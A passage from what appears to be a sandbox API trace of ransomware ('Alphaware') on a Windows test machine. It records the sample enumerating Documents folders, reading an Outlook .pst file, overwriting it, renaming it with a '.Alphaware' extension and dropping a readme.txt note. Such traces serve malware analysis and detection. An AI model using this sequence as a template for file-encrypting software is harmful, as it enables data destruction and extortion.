cAlternateFileName="MYMUSI~1")) returned 1 [0083.923] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Pictures", cAlternateFileName="MYPICT~1")) returned 1 [0083.923] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x79d4a2f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79d4a2f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x79d4a2f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Videos", cAlternateFileName="MYVIDE~1")) returned 1 [0083.923] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe63a6c10, ftCreationTime.dwHighDateTime=0x1d97567, ftLastAccessTime.dwLowDateTime=0x767660b0, ftLastAccessTime.dwHighDateTime=0x1d97624, ftLastWriteTime.dwLowDateTime=0x83cac620, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x11a34, dwReserved0=0x0, dwReserved1=0x0, cFileName="No5ewLi.ppt.Alphaware", cAlternateFileName="NO5EWL~1.ALP")) returned 1 [0083.923] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcd3dc580, ftCreationTime.dwHighDateTime=0x1d960cd, ftLastAccessTime.dwLowDateTime=0xe96d0280, ftLastAccessTime.dwHighDateTime=0x1d96d10, ftLastWriteTime.dwLowDateTime=0x83d6ad00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x37c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="O4VMeO_PmK30fk6.xlsx.Alphaware", cAlternateFileName="O4VMEO~1.ALP")) returned 1 [0083.923] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0083.923] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd77e2530, ftCreationTime.dwHighDateTime=0x1d96b04, ftLastAccessTime.dwLowDateTime=0xb70f9980, ftLastAccessTime.dwHighDateTime=0x1d970d8, ftLastWriteTime.dwLowDateTime=0x83e4f540, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1e3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ozdQhhdYCAhwn.odp.Alphaware", cAlternateFileName="OZDQHH~1.ALP")) returned 1 [0083.923] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeacec3e0, ftCreationTime.dwHighDateTime=0x1d91354, ftLastAccessTime.dwLowDateTime=0xc01a6a90, ftLastAccessTime.dwHighDateTime=0x1d969a4, ftLastWriteTime.dwLowDateTime=0x83ee7ac0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1f3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="PPCDrQ5.docx.Alphaware", cAlternateFileName="PPCDRQ~1.ALP")) returned 1 [0083.923] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd5589620, ftCreationTime.dwHighDateTime=0x1d97354, ftLastAccessTime.dwLowDateTime=0x78654fb0, ftLastAccessTime.dwHighDateTime=0x1d97635, ftLastWriteTime.dwLowDateTime=0x840b0b40, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1c420, dwReserved0=0x0, dwReserved1=0x0, cFileName="qQ69AqvCd-_gGmFEhfCj.pdf.Alphaware", cAlternateFileName="QQ69AQ~1.ALP")) returned 1 [0083.923] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8315dda0, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x8315dda0, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x8315dda0, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0083.923] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9d4ae3c0, ftCreationTime.dwHighDateTime=0x1d93fbd, ftLastAccessTime.dwLowDateTime=0xdea6e0c0, ftLastAccessTime.dwHighDateTime=0x1d96539, ftLastWriteTime.dwLowDateTime=0x84122f60, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1d248, dwReserved0=0x0, dwReserved1=0x0, cFileName="RkF0hT0Xfp-m3q.pptx.Alphaware", cAlternateFileName="RKF0HT~1.ALP")) returned 1 [0083.923] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7010b930, ftCreationTime.dwHighDateTime=0x1d973fb, ftLastAccessTime.dwLowDateTime=0xba2055c0, ftLastAccessTime.dwHighDateTime=0x1d975d7, ftLastWriteTime.dwLowDateTime=0xba2055c0, ftLastWriteTime.dwHighDateTime=0x1d975d7, nFileSizeHigh=0x0, nFileSizeLow=0x6553, dwReserved0=0x0, dwReserved1=0x0, cFileName="SLI9xvryK mch.ots", cAlternateFileName="SLI9XV~1.OTS")) returned 1 [0083.923] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4b8a7fd0, ftCreationTime.dwHighDateTime=0x1d8f5a0, ftLastAccessTime.dwLowDateTime=0x89facc90, ftLastAccessTime.dwHighDateTime=0x1d94e77, ftLastWriteTime.dwLowDateTime=0x8416f220, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x4ce0, dwReserved0=0x0, dwReserved1=0x0, cFileName="U6t2jBTAet1hJh.pptx.Alphaware", cAlternateFileName="U6T2JB~1.ALP")) returned 1 [0083.923] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x97851bb0, ftCreationTime.dwHighDateTime=0x1d95c12, ftLastAccessTime.dwLowDateTime=0x36d38630, ftLastAccessTime.dwHighDateTime=0x1d96400, ftLastWriteTime.dwLowDateTime=0x841e1640, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0xd2a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UgJB0bK8M6Fbzeqf.xlsx.Alphaware", cAlternateFileName="UGJB0B~1.ALP")) returned 1 [0083.923] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x77ec2190, ftCreationTime.dwHighDateTime=0x1d8f3df, ftLastAccessTime.dwLowDateTime=0x30b22920, ftLastAccessTime.dwHighDateTime=0x1d90f21, ftLastWriteTime.dwLowDateTime=0x842c5e80, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x1fc34, dwReserved0=0x0, dwReserved1=0x0, cFileName="wO--2PwPxtF.pptx.Alphaware", cAlternateFileName="WO--2P~1.ALP")) returned 1 [0083.924] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x291b14e0, ftCreationTime.dwHighDateTime=0x1d975a3, ftLastAccessTime.dwLowDateTime=0xdfce5f80, ftLastAccessTime.dwHighDateTime=0x1d975fd, ftLastWriteTime.dwLowDateTime=0xdfce5f80, ftLastWriteTime.dwHighDateTime=0x1d975fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="y- 0", cAlternateFileName="Y-0~1")) returned 1 [0083.924] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfa0a610, ftCreationTime.dwHighDateTime=0x1d96d2e, ftLastAccessTime.dwLowDateTime=0x40b60b60, ftLastAccessTime.dwHighDateTime=0x1d973fe, ftLastWriteTime.dwLowDateTime=0x84312140, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x157e0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ZiOJla1 Q-SXSl2W5.xlsx.Alphaware", cAlternateFileName="ZIOJLA~1.ALP")) returned 1 [0083.924] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cb78090, ftCreationTime.dwHighDateTime=0x1d96683, ftLastAccessTime.dwLowDateTime=0xbe0a3d60, ftLastAccessTime.dwHighDateTime=0x1d968e2, ftLastWriteTime.dwLowDateTime=0x84384560, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x119a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aOXubo 1XFZS.docx.Alphaware", cAlternateFileName="_AOXUB~1.ALP")) returned 1 [0083.924] FindNextFileW (in: hFindFile=0xd8a2b0, lpFindFileData=0x23ea10 | out: lpFindFileData=0x23ea10*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7cb78090, ftCreationTime.dwHighDateTime=0x1d96683, ftLastAccessTime.dwLowDateTime=0xbe0a3d60, ftLastAccessTime.dwHighDateTime=0x1d968e2, ftLastWriteTime.dwLowDateTime=0x84384560, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x119a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="_aOXubo 1XFZS.docx.Alphaware", cAlternateFileName="_AOXUB~1.ALP")) returned 0 [0083.924] FindClose (in: hFindFile=0xd8a2b0 | out: hFindFile=0xd8a2b0) returned 1 [0083.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e938) returned 1 [0083.924] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eb58) returned 1 [0083.924] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0083.924] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Music", nBufferLength=0x105, lpBuffer=0x23e640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\My Music", lpFilePart=0x0) returned 0x25 [0083.924] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Music\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my music\\*"), lpFindFileData=0x23e940 | out: lpFindFileData=0x23e940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0083.925] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0083.968] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0083.968] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Pictures", nBufferLength=0x105, lpBuffer=0x23e640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\My Pictures", lpFilePart=0x0) returned 0x28 [0083.969] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Pictures\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my pictures\\*"), lpFindFileData=0x23e940 | out: lpFindFileData=0x23e940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0083.969] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0083.972] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0083.972] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Videos", nBufferLength=0x105, lpBuffer=0x23e640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\My Videos", lpFilePart=0x0) returned 0x26 [0083.973] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\My Videos\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\my videos\\*"), lpFindFileData=0x23e940 | out: lpFindFileData=0x23e940*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff [0083.973] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e868) returned 1 [0083.976] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0083.976] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files", nBufferLength=0x105, lpBuffer=0x23e640, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files", lpFilePart=0x0) returned 0x2a [0083.976] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\*" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\*"), lpFindFileData=0x23e940 | out: lpFindFileData=0x23e940*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xd8a1f0 [0083.980] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x21e55d50, ftLastAccessTime.dwHighDateTime=0x1d7100d, ftLastWriteTime.dwLowDateTime=0x21e55d50, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0083.980] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4d7697b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x4d7697b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3aa38830, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x42400, dwReserved0=0x0, dwReserved1=0x0, cFileName="franc@gdllo.de.pst", cAlternateFileName="FRANC@~1.PST")) returned 1 [0083.980] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0083.980] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0083.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0083.980] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0084.000] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst", nBufferLength=0x105, lpBuffer=0x23e700, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst", lpFilePart=0x0) returned 0x3d [0084.000] SetFileAttributesW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst", dwFileAttributes=0x80) returned 1 [0084.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e958) returned 1 [0084.001] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\franc@gdllo.de.pst"), fInfoLevelId=0x0, lpFileInformation=0x240d340 | out: lpFileInformation=0x240d340*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x4d7697b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x4d7697b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x3aa38830, ftLastWriteTime.dwHighDateTime=0x1d7100d, nFileSizeHigh=0x0, nFileSizeLow=0x42400)) returned 1 [0084.001] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e908) returned 1 [0084.001] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst", nBufferLength=0x105, lpBuffer=0x23e4d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst", lpFilePart=0x0) returned 0x3d [0084.001] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9e8) returned 1 [0084.002] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\franc@gdllo.de.pst"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x254 [0084.002] GetFileType (hFile=0x254) returned 0x1 [0084.002] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e958) returned 1 [0084.002] GetFileType (hFile=0x254) returned 0x1 [0084.002] GetFileSize (in: hFile=0x254, lpFileSizeHigh=0x23eb68 | out: lpFileSizeHigh=0x23eb68*=0x0) returned 0x42400 [0084.002] ReadFile (in: hFile=0x254, lpBuffer=0x12796758, nNumberOfBytesToRead=0x42400, lpNumberOfBytesRead=0x23ea98, lpOverlapped=0x0 | out: lpBuffer=0x12796758*, lpNumberOfBytesRead=0x23ea98*=0x42400, lpOverlapped=0x0) returned 1 [0084.015] CloseHandle (hObject=0x254) returned 1 [0084.139] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e918) returned 1 [0084.140] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\franc@gdllo.de.pst"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0084.143] GetFileType (hFile=0x254) returned 0x1 [0084.143] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e888) returned 1 [0084.143] GetFileType (hFile=0x254) returned 0x1 [0084.154] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e888) returned 1 [0084.154] GetFileAttributesExW (in: lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\franc@gdllo.de.pst"), fInfoLevelId=0x0, lpFileInformation=0x23ebb0 | out: lpFileInformation=0x23ebb0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d7697b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x4d7697b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x845bfa00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x58634)) returned 1 [0084.154] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e838) returned 1 [0084.154] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\franc@gdllo.de.pst"), lpNewFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\franc@gdllo.de.pst.Alphaware" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\franc@gdllo.de.pst.alphaware")) returned 1 [0084.155] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23e9a8) returned 1 [0084.155] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Documents\\Outlook Files\\readme.txt" (normalized: "c:\\users\\keecfmwgj\\documents\\outlook files\\readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x254 [0084.156] GetFileType (hFile=0x254) returned 0x1 [0084.156] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e918) returned 1 [0084.156] GetFileType (hFile=0x254) returned 0x1 [0084.157] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0084.157] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4d6f7390, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x845bfa00, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x845bfa00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.157] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4d7697b0, ftCreationTime.dwHighDateTime=0x1d70912, ftLastAccessTime.dwLowDateTime=0x4d7697b0, ftLastAccessTime.dwHighDateTime=0x1d70912, ftLastWriteTime.dwLowDateTime=0x845bfa00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x58634, dwReserved0=0x0, dwReserved1=0x0, cFileName="franc@gdllo.de.pst.Alphaware", cAlternateFileName="FRANC@~1.ALP")) returned 1 [0084.158] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x845bfa00, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x845bfa00, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x845bfa00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 1 [0084.158] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x845bfa00, ftCreationTime.dwHighDateTime=0x1d9897a, ftLastAccessTime.dwLowDateTime=0x845bfa00, ftLastAccessTime.dwHighDateTime=0x1d9897a, ftLastWriteTime.dwLowDateTime=0x845bfa00, ftLastWriteTime.dwHighDateTime=0x1d9897a, nFileSizeHigh=0x0, nFileSizeLow=0x49d, dwReserved0=0x0, dwReserved1=0x0, cFileName="readme.txt", cAlternateFileName="")) returned 0 [0084.158] FindClose (in: hFindFile=0xd8a1f0 | out: hFindFile=0xd8a1f0) returned 1 [0084.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23e898) returned 1 [0084.158] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x23eab8) returned 1 [0084.158] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x23eb98) returned 1 [0084.158] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x291b14e0, ftCreationTime.dwHighDateTime=0x1d975a3, ftLastAccessTime.dwLowDateTime=0xdfce5f80, ftLastAccessTime.dwHighDateTime=0x1d975fd, ftLastWriteTime.dwLowDateTime=0xdfce5f80, ftLastWriteTime.dwHighDateTime=0x1d975fd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0084.158] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x39e81a30, ftCreationTime.dwHighDateTime=0x1d96666, ftLastAccessTime.dwLowDateTime=0x367e09f0, ftLastAccessTime.dwHighDateTime=0x1d97619, ftLastWriteTime.dwLowDateTime=0x367e09f0, ftLastWriteTime.dwHighDateTime=0x1d97619, nFileSizeHigh=0x0, nFileSizeLow=0x18ec9, dwReserved0=0x0, dwReserved1=0x0, cFileName="584vk2Slwl33KAWC.docx", cAlternateFileName="584VK2~1.DOC")) returned 1 [0084.158] FindNextFileW (in: hFindFile=0xd8a1f0, lpFindFileData=0x23e970 | out: lpFindFileData=0x23e970*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c0bf320, ftCreationTime.dwHighDateTime=0x1d96e03, ftLastAccessTime.dwLowDateTime=0x4dc1f4c0, ftLastAccessTime.dwHighDateTime=0x1d9738d, ftLastWriteTime.dwLowDateTime=0x4dc1f4c0, ftLastWriteTime.dwHighDateTime=0x1d9738d, nFileSizeHigh=0x0, nFileSizeLow=0x44a6, dwReserved0=0x0, dwReserved1=0x0, cFileName="9WZXgiA1p9.rtf", cAlternateFileName="9WZXGI~1.RTF")) returned 1 [0084.158] FindNextFileW (in: hFindFile=0xd8a1f0, 